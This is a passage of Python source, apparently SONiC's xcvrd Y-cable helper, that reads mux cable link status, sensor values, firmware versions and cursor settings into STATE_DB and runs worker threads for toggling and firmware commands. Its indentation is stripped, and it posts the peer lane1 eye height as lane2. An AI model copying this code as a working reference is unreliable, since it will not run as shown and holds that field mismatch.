mux_info_dict["nic_eye_height_lane2"] = "N/A"
if read_side == 1:
with y_cable_port_locks[physical_port]:
try:
link_state_tor_a = port_instance.is_link_active(port_instance.TARGET_TOR_A)
except Exception as e:
link_state_tor_a = False
helper_logger.log_warning("Failed to execute the is_link_active TOR A side API for port {} due to {}".format(physical_port,repr(e)))
if link_state_tor_a:
mux_info_dict["link_status_self"] = "up"
else:
mux_info_dict["link_status_self"] = "down"
with y_cable_port_locks[physical_port]:
try:
link_state_tor_b = port_instance.is_link_active(port_instance.TARGET_TOR_B)
except Exception as e:
link_state_tor_b = False
helper_logger.log_warning("Failed to execute the is_link_active TOR B side API for port {} due to {}".format(physical_port,repr(e)))
if link_state_tor_b:
mux_info_dict["link_status_peer"] = "up"
else:
mux_info_dict["link_status_peer"] = "down"
else:
with y_cable_port_locks[physical_port]:
try:
link_state_tor_b = port_instance.is_link_active(port_instance.TARGET_TOR_B)
except Exception as e:
link_state_tor_b = False
helper_logger.log_warning("Failed to execute the is_link_active TOR B side API for port {} due to {}".format(physical_port,repr(e)))
if link_state_tor_b:
mux_info_dict["link_status_self"] = "up"
else:
mux_info_dict["link_status_self"] = "down"
with y_cable_port_locks[physical_port]:
try:
link_state_tor_a = port_instance.is_link_active(port_instance.TARGET_TOR_A)
except Exception as e:
link_state_tor_a = False
helper_logger.log_warning("Failed to execute the is_link_active TOR A side API for port {} due to {}".format(physical_port,repr(e)))
if link_state_tor_a:
mux_info_dict["link_status_peer"] = "up"
else:
mux_info_dict["link_status_peer"] = "down"
with y_cable_port_locks[physical_port]:
if port_instance.is_link_active(port_instance.TARGET_NIC):
mux_info_dict["link_status_nic"] = "up"
else:
mux_info_dict["link_status_nic"] = "down"
get_firmware_dict(physical_port, port_instance, port_instance.TARGET_NIC, "nic", mux_info_dict, logical_port_name)
if read_side == 1:
get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_A, "self", mux_info_dict, logical_port_name)
get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_B, "peer", mux_info_dict, logical_port_name)
else:
get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_A, "peer", mux_info_dict, logical_port_name)
get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_B, "self", mux_info_dict, logical_port_name)
with y_cable_port_locks[physical_port]:
try:
res = port_instance.get_local_temperature()
except Exception as e:
res = None
helper_logger.log_warning("Failed to execute the get_local_temperature for port {} due to {}".format(physical_port,repr(e)))
if res is not None and res is not port_instance.EEPROM_ERROR and isinstance(res, int) and res >= 0:
mux_info_dict["internal_temperature"] = res
else:
mux_info_dict["internal_temperature"] = "N/A"
with y_cable_port_locks[physical_port]:
try:
res = port_instance.get_local_voltage()
except Exception as e:
res = None
helper_logger.log_warning("Failed to execute the get_local_voltage for port {} due to {}".format(physical_port,repr(e)))
if res is not None and res is not port_instance.EEPROM_ERROR and isinstance(res, float):
mux_info_dict["internal_voltage"] = res
else:
mux_info_dict["internal_voltage"] = "N/A"
with y_cable_port_locks[physical_port]:
try:
res = port_instance.get_nic_voltage()
except Exception as e:
res = None
helper_logger.log_warning("Failed to execute the get_nic_voltage for port {} due to {}".format(physical_port,repr(e)))
if res is not None and res is not port_instance.EEPROM_ERROR and isinstance(res, float):
mux_info_dict["nic_voltage"] = res
else:
mux_info_dict["nic_voltage"] = "N/A"
with y_cable_port_locks[physical_port]:
try:
res = port_instance.get_nic_temperature()
except Exception as e:
res = None
helper_logger.log_warning("Failed to execute the get_nic_temperature for port {} due to {}".format(physical_port,repr(e)))
if res is not None and res is not port_instance.EEPROM_ERROR and isinstance(res, int) and res >= 0:
mux_info_dict["nic_temperature"] = res
else:
mux_info_dict["nic_temperature"] = "N/A"
return mux_info_dict
def get_muxcable_static_info(physical_port, logical_port_name, port_mapping):
mux_static_info_dict = {}
y_cable_tbl, state_db = {}, {}
port_instance = y_cable_port_instances.get(physical_port)
if port_instance is None:
helper_logger.log_error("Error: Could not get port instance for muxcable info for Y cable port {}".format(logical_port_name))
return -1
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
y_cable_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
asic_index = port_mapping.get_asic_id_for_logical_port(
logical_port_name)
if asic_index is None:
helper_logger.log_warning(
"Got invalid asic index for {}, ignored".format(logical_port_name))
return -1
(status, fvs) = y_cable_tbl[asic_index].get(logical_port_name)
if status is False:
helper_logger.log_warning("Could not retreive fieldvalue pairs for {}, inside state_db table {}".format(
logical_port_name, y_cable_tbl[asic_index].getTableName()))
return -1
mux_port_dict = dict(fvs)
read_side = int(mux_port_dict.get("read_side"))
if read_side == 1:
mux_static_info_dict["read_side"] = "tor1"
else:
mux_static_info_dict["read_side"] = "tor2"
dummy_list = ["N/A", "N/A", "N/A", "N/A", "N/A"]
cursor_nic_values = []
cursor_tor1_values = []
cursor_tor2_values = []
for i in range(1, 3):
try:
cursor_values_nic = port_instance.get_target_cursor_values(i, port_instance.TARGET_NIC)
except Exception as e:
cursor_values_nic = None
helper_logger.log_warning("Failed to execute the get_target_cursor_value NIC for port {} due to {}".format(physical_port,repr(e)))
if cursor_values_nic is not None and cursor_values_nic is not port_instance.EEPROM_ERROR and isinstance(cursor_values_nic, list):
cursor_nic_values.append(cursor_values_nic)
else:
cursor_nic_values.append(dummy_list)
try:
cursor_values_tor1 = port_instance.get_target_cursor_values(i, port_instance.TARGET_TOR_A)
except Exception as e:
cursor_values_tor1 = None
helper_logger.log_warning("Failed to execute the get_target_cursor_value ToR 1 for port {} due to {}".format(physical_port,repr(e)))
if cursor_values_tor1 is not None and cursor_values_tor1 is not port_instance.EEPROM_ERROR and isinstance(cursor_values_tor1, list):
cursor_tor1_values.append(cursor_values_tor1)
else:
cursor_tor1_values.append(dummy_list)
try:
cursor_values_tor2 = port_instance.get_target_cursor_values(i, port_instance.TARGET_TOR_B)
except Exception as e:
cursor_values_tor2 = None
helper_logger.log_warning("Failed to execute the get_target_cursor_value ToR 2 for port {} due to {}".format(physical_port,repr(e)))
if cursor_values_tor2 is not None and cursor_values_tor2 is not port_instance.EEPROM_ERROR and isinstance(cursor_values_tor2, list):
cursor_tor2_values.append(cursor_values_tor2)
else:
cursor_tor2_values.append(dummy_list)
for i in range(1, 3):
mux_static_info_dict[("nic_lane{}_precursor1".format(i))] = cursor_nic_values[i-1][0]
mux_static_info_dict[("nic_lane{}_precursor2".format(i))] = cursor_nic_values[i-1][1]
mux_static_info_dict[("nic_lane{}_maincursor".format(i))] = cursor_nic_values[i-1][2]
mux_static_info_dict[("nic_lane{}_postcursor1".format(i))] = cursor_nic_values[i-1][3]
mux_static_info_dict[("nic_lane{}_postcursor2".format(i))] = cursor_nic_values[i-1][4]
if read_side == 1:
for i in range(1, 3):
mux_static_info_dict[("tor_self_lane{}_precursor1".format(i))] = cursor_tor1_values[i-1][0]
mux_static_info_dict[("tor_self_lane{}_precursor2".format(i))] = cursor_tor1_values[i-1][1]
mux_static_info_dict[("tor_self_lane{}_maincursor".format(i))] = cursor_tor1_values[i-1][2]
mux_static_info_dict[("tor_self_lane{}_postcursor1".format(i))] = cursor_tor1_values[i-1][3]
mux_static_info_dict[("tor_self_lane{}_postcursor2".format(i))] = cursor_tor1_values[i-1][4]
for i in range(1, 3):
mux_static_info_dict[("tor_peer_lane{}_precursor1".format(i))] = cursor_tor2_values[i-1][0]
mux_static_info_dict[("tor_peer_lane{}_precursor2".format(i))] = cursor_tor2_values[i-1][1]
mux_static_info_dict[("tor_peer_lane{}_maincursor".format(i))] = cursor_tor2_values[i-1][2]
mux_static_info_dict[("tor_peer_lane{}_postcursor1".format(i))] = cursor_tor2_values[i-1][3]
mux_static_info_dict[("tor_peer_lane{}_postcursor2".format(i))] = cursor_tor2_values[i-1][4]
else:
for i in range(1, 3):
mux_static_info_dict[("tor_self_lane{}_precursor1".format(i))] = cursor_tor2_values[i-1][0]
mux_static_info_dict[("tor_self_lane{}_precursor2".format(i))] = cursor_tor2_values[i-1][1]
mux_static_info_dict[("tor_self_lane{}_maincursor".format(i))] = cursor_tor2_values[i-1][2]
mux_static_info_dict[("tor_self_lane{}_postcursor1".format(i))] = cursor_tor2_values[i-1][3]
mux_static_info_dict[("tor_self_lane{}_postcursor2".format(i))] = cursor_tor2_values[i-1][4]
for i in range(1, 3):
mux_static_info_dict[("tor_peer_lane{}_precursor1".format(i))] = cursor_tor1_values[i-1][0]
mux_static_info_dict[("tor_peer_lane{}_precursor2".format(i))] = cursor_tor1_values[i-1][1]
mux_static_info_dict[("tor_peer_lane{}_maincursor".format(i))] = cursor_tor1_values[i-1][2]
mux_static_info_dict[("tor_peer_lane{}_postcursor1".format(i))] = cursor_tor1_values[i-1][3]
mux_static_info_dict[("tor_peer_lane{}_postcursor2".format(i))] = cursor_tor1_values[i-1][4]
return mux_static_info_dict
def post_port_mux_info_to_db(logical_port_name, port_mapping, table):
physical_port_list = port_mapping.logical_port_name_to_physical_port_list(logical_port_name)
if physical_port_list is None:
helper_logger.log_error("No physical ports found for logical port '{}'".format(logical_port_name))
return -1
if len(physical_port_list) > 1:
helper_logger.log_warning("Error: Retreived multiple ports for a Y cable port {}".format(logical_port_name))
return -1
for physical_port in physical_port_list:
if not y_cable_wrapper_get_presence(physical_port):
helper_logger.log_warning("Error: trying to post mux info without presence of port {}".format(logical_port_name))
continue
mux_info_dict = get_muxcable_info(physical_port, logical_port_name, port_mapping)
if mux_info_dict is not None and mux_info_dict is not -1:
#transceiver_dict[physical_port] = port_info_dict
fvs = swsscommon.FieldValuePairs(
[('tor_active', mux_info_dict["tor_active"]),
('mux_direction', str(mux_info_dict["mux_direction"])),
('manual_switch_count', str(mux_info_dict["manual_switch_count"])),
('auto_switch_count', str(mux_info_dict["auto_switch_count"])),
('link_status_self', mux_info_dict["link_status_self"]),
('link_status_peer', mux_info_dict["link_status_peer"]),
('link_status_nic', mux_info_dict["link_status_nic"]),
('self_eye_height_lane1', str(mux_info_dict["self_eye_height_lane1"])),
('self_eye_height_lane2', str(mux_info_dict["self_eye_height_lane2"])),
('peer_eye_height_lane1', str(mux_info_dict["peer_eye_height_lane1"])),
('peer_eye_height_lane2', str(mux_info_dict["peer_eye_height_lane1"])),
('nic_eye_height_lane1', str(mux_info_dict["nic_eye_height_lane1"])),
('nic_eye_height_lane2', str(mux_info_dict["nic_eye_height_lane2"])),
('internal_temperature', str(mux_info_dict["internal_temperature"])),
('internal_voltage', str(mux_info_dict["internal_voltage"])),
('nic_temperature', str(mux_info_dict["nic_temperature"])),
('nic_voltage', str(mux_info_dict["nic_voltage"])),
('version_self_active', str(mux_info_dict["version_self_active"])),
('version_self_inactive', str(mux_info_dict["version_self_inactive"])),
('version_self_next', str(mux_info_dict["version_self_next"])),
('version_peer_active', str(mux_info_dict["version_peer_active"])),
('version_peer_inactive', str(mux_info_dict["version_peer_inactive"])),
('version_peer_next', str(mux_info_dict["version_peer_next"])),
('version_nic_active', str(mux_info_dict["version_nic_active"])),
('version_nic_inactive', str(mux_info_dict["version_nic_inactive"])),
('version_nic_next', str(mux_info_dict["version_nic_next"]))
])
table.set(logical_port_name, fvs)
else:
return -1
def post_port_mux_static_info_to_db(logical_port_name, port_mapping, static_table):
physical_port_list = port_mapping.logical_port_name_to_physical_port_list(logical_port_name)
if physical_port_list is None:
helper_logger.log_error("No physical ports found for logical port '{}'".format(logical_port_name))
return -1
if len(physical_port_list) > 1:
helper_logger.log_warning(
"Error: Retreived multiple ports for a Y cable port {}".format(logical_port_name))
return -1
for physical_port in physical_port_list:
if not y_cable_wrapper_get_presence(physical_port):
continue
mux_static_info_dict = get_muxcable_static_info(physical_port, logical_port_name, port_mapping)
if mux_static_info_dict is not None and mux_static_info_dict is not -1:
#transceiver_dict[physical_port] = port_info_dict
fvs = swsscommon.FieldValuePairs(
[('read_side', mux_static_info_dict["read_side"]),
('nic_lane1_precursor1', str(mux_static_info_dict["nic_lane1_precursor1"])),
('nic_lane1_precursor2', str(mux_static_info_dict["nic_lane1_precursor2"])),
('nic_lane1_maincursor', str(mux_static_info_dict["nic_lane1_maincursor"])),
('nic_lane1_postcursor1', str(mux_static_info_dict["nic_lane1_postcursor1"])),
('nic_lane1_postcursor2', str(mux_static_info_dict["nic_lane1_postcursor2"])),
('nic_lane2_precursor1', str(mux_static_info_dict["nic_lane2_precursor1"])),
('nic_lane2_precursor2', str(mux_static_info_dict["nic_lane2_precursor2"])),
('nic_lane2_maincursor', str(mux_static_info_dict["nic_lane2_maincursor"])),
('nic_lane2_postcursor1', str(mux_static_info_dict["nic_lane2_postcursor1"])),
('nic_lane2_postcursor2', str(mux_static_info_dict["nic_lane2_postcursor2"])),
('tor_self_lane1_precursor1', str(mux_static_info_dict["tor_self_lane1_precursor1"])),
('tor_self_lane1_precursor2', str(mux_static_info_dict["tor_self_lane1_precursor2"])),
('tor_self_lane1_maincursor', str(mux_static_info_dict["tor_self_lane1_maincursor"])),
('tor_self_lane1_postcursor1', str(mux_static_info_dict["tor_self_lane1_postcursor1"])),
('tor_self_lane1_postcursor2', str(mux_static_info_dict["tor_self_lane1_postcursor2"])),
('tor_self_lane2_precursor1', str(mux_static_info_dict["tor_self_lane2_precursor1"])),
('tor_self_lane2_precursor2', str(mux_static_info_dict["tor_self_lane2_precursor2"])),
('tor_self_lane2_maincursor', str(mux_static_info_dict["tor_self_lane2_maincursor"])),
('tor_self_lane2_postcursor1', str(mux_static_info_dict["tor_self_lane2_postcursor1"])),
('tor_self_lane2_postcursor2', str(mux_static_info_dict["tor_self_lane2_postcursor2"])),
('tor_peer_lane1_precursor1', str(mux_static_info_dict["tor_peer_lane1_precursor1"])),
('tor_peer_lane1_precursor2', str(mux_static_info_dict["tor_peer_lane1_precursor2"])),
('tor_peer_lane1_maincursor', str(mux_static_info_dict["tor_peer_lane1_maincursor"])),
('tor_peer_lane1_postcursor1', str(mux_static_info_dict["tor_peer_lane1_postcursor1"])),
('tor_peer_lane1_postcursor2', str(mux_static_info_dict["tor_peer_lane1_postcursor2"])),
('tor_peer_lane2_precursor1', str(mux_static_info_dict["tor_peer_lane2_precursor1"])),
('tor_peer_lane2_precursor2', str(mux_static_info_dict["tor_peer_lane2_precursor2"])),
('tor_peer_lane2_maincursor', str(mux_static_info_dict["tor_peer_lane2_maincursor"])),
('tor_peer_lane2_postcursor1', str(mux_static_info_dict["tor_peer_lane2_postcursor1"])),
('tor_peer_lane2_postcursor2', str(mux_static_info_dict["tor_peer_lane2_postcursor2"]))
])
static_table.set(logical_port_name, fvs)
else:
return -1
def post_mux_static_info_to_db(is_warm_start, port_mapping, stop_event=threading.Event()):
# Connect to STATE_DB and create transceiver mux/static info tables
state_db, static_tbl = {}, {}
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
static_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], MUX_CABLE_STATIC_INFO_TABLE)
# Post all the current interface dom/sfp info to STATE_DB
logical_port_list = port_mapping.logical_port_list
for logical_port_name in logical_port_list:
if stop_event.is_set():
break
# Get the asic to which this port belongs
asic_index = port_mapping.get_asic_id_for_logical_port(logical_port_name)
if asic_index is None:
helper_logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port_name))
continue
post_port_mux_static_info_to_db(logical_port_name, port_mapping, static_tbl[asic_index])
def post_mux_info_to_db(is_warm_start, port_mapping, stop_event=threading.Event()):
# Connect to STATE_DB and create transceiver mux/static info tables
state_db, mux_tbl, static_tbl = {}, {}, {}
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
mux_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], MUX_CABLE_INFO_TABLE)
# Post all the current interface dom/sfp info to STATE_DB
logical_port_list = port_mapping.logical_port_list
for logical_port_name in logical_port_list:
if stop_event.is_set():
break
# Get the asic to which this port belongs
asic_index = port_mapping.get_asic_id_for_logical_port(logical_port_name)
if asic_index is None:
helper_logger.log_warning(
"Got invalid asic index for {}, ignored".format(logical_port_name))
continue
post_port_mux_info_to_db(logical_port_name, port_mapping, mux_tbl[asic_index])
def task_download_firmware_worker(port, physical_port, port_instance, file_full_path, xcvrd_down_fw_rsp_tbl, xcvrd_down_fw_cmd_sts_tbl, rc):
helper_logger.log_debug("worker thread launched for downloading physical port {} path {}".format(physical_port, file_full_path))
try:
status = port_instance.download_firmware(file_full_path)
time.sleep(5)
except Exception as e:
status = -1
helper_logger.log_warning("Failed to execute the download firmware API for port {} due to {}".format(physical_port,repr(e)))
set_result_and_delete_port('status', status, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, port)
helper_logger.log_debug(" downloading complete {} {} {}".format(physical_port, file_full_path, status))
rc[0] = status
helper_logger.log_debug("download thread finished port {} physical_port {}".format(port, physical_port))
# Thread wrapper class to update y_cable status periodically
class YCableTableUpdateTask(object):
def __init__(self, port_mapping):
self.task_thread = None
self.task_cli_thread = None
self.task_download_firmware_thread = {}
self.task_stopping_event = threading.Event()
self.port_mapping = copy.deepcopy(port_mapping)
if multi_asic.is_multi_asic():
# Load the namespace details first from the database_global.json file.
swsscommon.SonicDBConfig.initializeGlobalConfig()
def task_worker(self):
# Connect to STATE_DB and APPL_DB and get both the HW_MUX_STATUS_TABLE info
appl_db, state_db, config_db, status_tbl, y_cable_tbl = {}, {}, {}, {}, {}
y_cable_tbl_keys = {}
mux_cable_command_tbl, y_cable_command_tbl = {}, {}
mux_metrics_tbl = {}
asic_context = {}
sel = swsscommon.Select()
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
# Open a handle to the Application database, in all namespaces
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
appl_db[asic_id] = daemon_base.db_connect("APPL_DB", namespace)
config_db[asic_id] = daemon_base.db_connect("CONFIG_DB", namespace)
status_tbl[asic_id] = swsscommon.SubscriberStateTable(
appl_db[asic_id], swsscommon.APP_HW_MUX_CABLE_TABLE_NAME)
mux_cable_command_tbl[asic_id] = swsscommon.SubscriberStateTable(
appl_db[asic_id], swsscommon.APP_MUX_CABLE_COMMAND_TABLE_NAME)
y_cable_command_tbl[asic_id] = swsscommon.Table(
appl_db[asic_id], swsscommon.APP_MUX_CABLE_COMMAND_TABLE_NAME)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
y_cable_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
mux_metrics_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], swsscommon.STATE_MUX_METRICS_TABLE_NAME)
y_cable_tbl_keys[asic_id] = y_cable_tbl[asic_id].getKeys()
port_tbl = swsscommon.SubscriberStateTable(config_db[asic_id], swsscommon.CFG_PORT_TABLE_NAME)
asic_context[port_tbl] = asic_id
sel.addSelectable(status_tbl[asic_id])
sel.addSelectable(mux_cable_command_tbl[asic_id])
sel.addSelectable(port_tbl)
# Listen indefinitely for changes to the HW_MUX_CABLE_TABLE in the Application DB's
while True:
# Use timeout to prevent ignoring the signals we want to handle
# in signal_handler() (e.g. SIGTERM for graceful shutdown)
if self.task_stopping_event.is_set():
break
(state, selectableObj) = sel.select(SELECT_TIMEOUT)
if state == swsscommon.Select.TIMEOUT:
# Do not flood log when select times out
continue
if state != swsscommon.Select.OBJECT:
helper_logger.log_warning(
"sel.select() did not return swsscommon.Select.OBJECT for sonic_y_cable updates")
continue
# Get the redisselect object from selectable object
redisSelectObj = swsscommon.CastSelectableToRedisSelectObj(
selectableObj)
# Get the corresponding namespace from redisselect db connector object
namespace = redisSelectObj.getDbConnector().getNamespace()
asic_index = multi_asic.get_asic_index_from_namespace(namespace)
read_port_config_change(asic_context, self.port_mapping, helper_logger, self.port_mapping.handle_port_change_event)
while True:
(port, op, fvp) = status_tbl[asic_index].pop()
if not port:
break
helper_logger.log_debug("Y_CABLE_DEBUG: received an event for port transition {} {}".format(port, threading.currentThread().getName()))
# entering this section signifies a start for xcvrd state
# change request from swss so initiate recording in mux_metrics table
time_start = datetime.datetime.utcnow().strftime("%Y-%b-%d %H:%M:%S.%f")
if fvp:
# This check might be redundant, to check, the presence of this Port in keys
# in logical_port_list but keep for now for coherency
# also skip checking in logical_port_list inside sfp_util
if port not in y_cable_tbl_keys[asic_index]:
continue
fvp_dict = dict(fvp)
if "state" in fvp_dict:
# got a state change
new_status = fvp_dict["state"]
(status, fvs) = y_cable_tbl[asic_index].get(port)
if status is False:
helper_logger.log_warning("Could not retreive fieldvalue pairs for {}, inside state_db table {}".format(
port, y_cable_tbl[asic_index].getTableName()))
continue
mux_port_dict = dict(fvs)
old_status = mux_port_dict.get("state")
read_side = mux_port_dict.get("read_side")
# Now whatever is the state requested, toggle the mux appropriately
helper_logger.log_debug("Y_CABLE_DEBUG: xcvrd trying to transition port {} from {} to {}".format(port, old_status, new_status))
active_side = update_tor_active_side(read_side, new_status, port, self.port_mapping)
if active_side == -1:
helper_logger.log_warning("ERR: Got a change event for toggle but could not toggle the mux-direction for port {} state from {} to {}, writing unknown".format(
port, old_status, new_status))
new_status = 'unknown'
helper_logger.log_debug("Y_CABLE_DEBUG: xcvrd successful to transition port {} from {} to {} and write back to the DB {}".format(port, old_status, new_status, threading.currentThread().getName()))
helper_logger.log_notice("Got a change event for toggle the mux-direction active side for port {} state from {} to {} {}".format(
port, old_status, new_status, threading.currentThread().getName()))
time_end = datetime.datetime.utcnow().strftime("%Y-%b-%d %H:%M:%S.%f")
fvs_metrics = swsscommon.FieldValuePairs([('xcvrd_switch_{}_start'.format(new_status), str(time_start)),
('xcvrd_switch_{}_end'.format(new_status), str(time_end))])
mux_metrics_tbl[asic_index].set(port, fvs_metrics)
fvs_updated = swsscommon.FieldValuePairs([('state', new_status),
('read_side', read_side),
('active_side', str(active_side))])
y_cable_tbl[asic_index].set(port, fvs_updated)
else:
helper_logger.log_info("Got a change event on port {} of table {} that does not contain state".format(
port, swsscommon.APP_HW_MUX_CABLE_TABLE_NAME))
while True:
(port_m, op_m, fvp_m) = mux_cable_command_tbl[asic_index].pop()
if not port_m:
break
helper_logger.log_debug("Y_CABLE_DEBUG: received a probe for port status {} {}".format(port_m, threading.currentThread().getName()))
if fvp_m:
if port_m not in y_cable_tbl_keys[asic_index]:
continue
fvp_dict = dict(fvp_m)
if "command" in fvp_dict:
# check if xcvrd got a probe command
probe_identifier = fvp_dict["command"]
if probe_identifier == "probe":
(status, fv) = y_cable_tbl[asic_index].get(port_m)
if status is False:
helper_logger.log_warning("Could not retreive fieldvalue pairs for {}, inside state_db table {}".format(
port_m, y_cable_tbl[asic_index].getTableName()))
continue
mux_port_dict = dict(fv)
read_side = mux_port_dict.get("read_side")
update_appdb_port_mux_cable_response_table(port_m, self.port_mapping, asic_index, appl_db, int(read_side))
def task_cli_worker(self):
# Connect to STATE_DB and APPL_DB and get both the HW_MUX_STATUS_TABLE info
appl_db, config_db , state_db, y_cable_tbl = {}, {}, {}, {}
xcvrd_log_tbl = {}
xcvrd_down_fw_cmd_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_down_fw_cmd_sts_tbl = {}, {}, {}
xcvrd_down_fw_status_cmd_tbl, xcvrd_down_fw_status_rsp_tbl, xcvrd_down_fw_status_cmd_sts_tbl = {}, {}, {}
xcvrd_acti_fw_cmd_tbl, xcvrd_acti_fw_rsp_tbl, xcvrd_acti_fw_cmd_sts_tbl = {}, {}, {}
xcvrd_roll_fw_cmd_tbl, xcvrd_roll_fw_rsp_tbl, xcvrd_roll_fw_cmd_sts_tbl = {}, {}, {}
xcvrd_show_fw_cmd_tbl, xcvrd_show_fw_rsp_tbl, xcvrd_show_fw_cmd_sts_tbl, xcvrd_show_fw_res_tbl = {}, {}, {}, {}
xcvrd_show_hwmode_dir_cmd_tbl, xcvrd_show_hwmode_dir_rsp_tbl, xcvrd_show_hwmode_dir_cmd_sts_tbl = {}, {}, {}
xcvrd_show_hwmode_swmode_cmd_tbl, xcvrd_show_hwmode_swmode_rsp_tbl, xcvrd_show_hwmode_swmode_cmd_sts_tbl = {}, {}, {}
xcvrd_config_hwmode_state_cmd_tbl, xcvrd_config_hwmode_state_rsp_tbl , xcvrd_config_hwmode_state_cmd_sts_tbl= {}, {}, {}
xcvrd_config_hwmode_swmode_cmd_tbl, xcvrd_config_hwmode_swmode_rsp_tbl , xcvrd_config_hwmode_swmode_cmd_sts_tbl= {}, {}, {}
sel = swsscommon.Select()
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
# Open a handle to the Application database, in all namespaces
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
appl_db[asic_id] = daemon_base.db_connect("APPL_DB", namespace)
config_db[asic_id] = daemon_base.db_connect("CONFIG_DB", namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
xcvrd_log_tbl[asic_id] = swsscommon.SubscriberStateTable(
config_db[asic_id], "XCVRD_LOG")
xcvrd_show_fw_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
appl_db[asic_id], "XCVRD_SHOW_FW_CMD")
xcvrd_show_fw_cmd_sts_tbl[asic_id] = swsscommon.Table(
appl_db[asic_id], "XCVRD_SHOW_FW_CMD")
xcvrd_show_fw_rsp_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], "XCVRD_SHOW_FW_RSP")
xcvrd_show_fw_res_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], "XCVRD_SHOW_FW_RES")
xcvrd_down_fw_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
appl_db[asic_id], "XCVRD_DOWN_FW_CMD")
xcvrd_down_fw_cmd_sts_tbl[asic_id] = swsscommon.Table(
appl_db[asic_id], "XCVRD_DOWN_FW_CMD")
xcvrd_down_fw_rsp_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], "XCVRD_DOWN_FW_RSP")
xcvrd_down_fw_status_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
appl_db[asic_id], "XCVRD_DOWN_FW_STATUS_CMD")
xcvrd_down_fw_status_rsp_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], "XCVRD_DOWN_FW_STATUS_RSP")
xcvrd_acti_fw_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
appl_db[asic_id], "XCVRD_ACTI_FW_CMD")
xcvrd_acti_fw_cmd_sts_tbl[asic_id] = swsscommon.Table(
appl_db[asic_id], "XCVRD_ACTI_FW_CMD")
xcvrd_acti_fw_rsp_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], "XCVRD_ACTI_FW_RSP")
xcvrd_roll_fw_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
appl_db[asic_id], "XCVRD_ROLL_FW_CMD")
xcvrd_roll_fw_cmd_sts_tbl[asic_id] = swsscommon.Table(
appl_db[asic_id], "XCVRD_ROLL_FW_CMD")
xcvrd_roll_fw_rsp_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], "XCVRD_ROLL_FW_RSP")
xcvrd_show_hwmode_dir_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
appl_db[asic_id], "XCVRD_SHOW_HWMODE_DIR_CMD")
xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_id] = swsscommon.Table(
appl_db[asic_id], "XCVRD_SHOW_HWMODE_DIR_CMD")
xcvrd_show_hwmode_dir_rsp_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], "XCVRD_SHOW_HWMODE_DIR_RSP")
xcvrd_config_hwmode_state_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
appl_db[asic_id], "XCVRD_CONFIG_HWMODE_DIR_CMD")
xcvrd_config_hwmode_state_cmd_sts_tbl[asic_id] = swsscommon.Table(
appl_db[asic_id], "XCVRD_CONFIG_HWMODE_DIR_CMD")
xcvrd_config_hwmode_state_rsp_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], "XCVRD_CONFIG_HWMODE_DIR_RSP")
xcvrd_config_hwmode_swmode_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
appl_db[asic_id], "XCVRD_CONFIG_HWMODE_SWMODE_CMD")
xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_id] = swsscommon.Table(
appl_db[asic_id], "XCVRD_CONFIG_HWMODE_SWMODE_CMD")
xcvrd_config_hwmode_swmode_rsp_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], "XCVRD_CONFIG_HWMODE_SWMODE_RSP")
xcvrd_show_hwmode_swmode_cmd_tbl[asic_id] = swsscommon.SubscriberStateTable(
appl_db[asic_id], "XCVRD_SHOW_HWMODE_SWMODE_CMD")
xcvrd_show_hwmode_swmode_cmd_sts_tbl[asic_id] = swsscommon.Table(
appl_db[asic_id], "XCVRD_SHOW_HWMODE_SWMODE_CMD")
xcvrd_show_hwmode_swmode_rsp_tbl[asic_id] = swsscommon.Table(
state_db[asic_id], "XCVRD_SHOW_HWMODE_SWMODE_RSP")
sel.addSelectable(xcvrd_log_tbl[asic_id])
sel.addSelectable(xcvrd_down_fw_cmd_tbl[asic_id])
sel.addSelectable(xcvrd_down_fw_status_cmd_tbl[asic_id])
sel.addSelectable(xcvrd_acti_fw_cmd_tbl[asic_id])
sel.addSelectable(xcvrd_roll_fw_cmd_tbl[asic_id])
